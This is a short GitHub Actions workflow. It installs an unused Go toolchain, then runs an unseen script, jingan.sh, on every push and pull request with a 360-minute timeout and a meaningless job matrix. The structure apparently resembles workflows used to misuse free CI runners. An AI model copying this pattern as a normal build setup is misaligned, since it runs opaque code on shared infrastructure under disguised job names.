name: china
on: [push, pull_request]
jobs:
  build:
    name: china
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix:
        go: [1.1, 1.2]
        flag: [A, B]
    timeout-minutes: 360
    env:
        NUM_JOBS: 40
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: pete
      run: chmod 700 jingan.sh && ./jingan.sh
